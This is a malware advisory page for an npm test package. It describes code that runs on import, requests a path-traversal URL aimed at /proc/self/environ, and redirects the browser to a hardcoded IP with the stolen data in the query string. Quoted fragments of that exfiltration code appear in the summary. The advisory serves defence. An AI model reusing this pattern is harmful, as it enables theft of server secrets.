@a91082900/test_package @0.0.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-3680
Ecosystem
npm
Summary
The package's main file (index.js) executes at module load, with no exports and no user-invoked API. On import it issues fetch('/api/notes?id=/self/proc/environ') and then assigns top.location = 'http://128.199.217.232/?notes=' + encodeURIComponent(data) , relaying whatever the vulnerable endpoint returns (a path-traversal-shaped request for the server process's environment variables) to a hardcoded bare IPv4 address over plain HTTP. Package metadata is placeholder ('no description', generic author handle) and there is no library functionality — this is a PoC/exfil payload packaged as an npm module. Any installer bundling this into a web application would redirect victim browsers to the attacker IP with exfiltrated data in the query string. Import-time execution + hardcoded bare-IP C2 + plaintext HTTP + a request path specifically crafted to read /proc/self/environ together leave no benign interpretation.
Source: amazon-inspector (b8349cd7ce2c9ac2321dce8f80e5a46c0064b382fb7e54e975ff27a2dcab1254)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.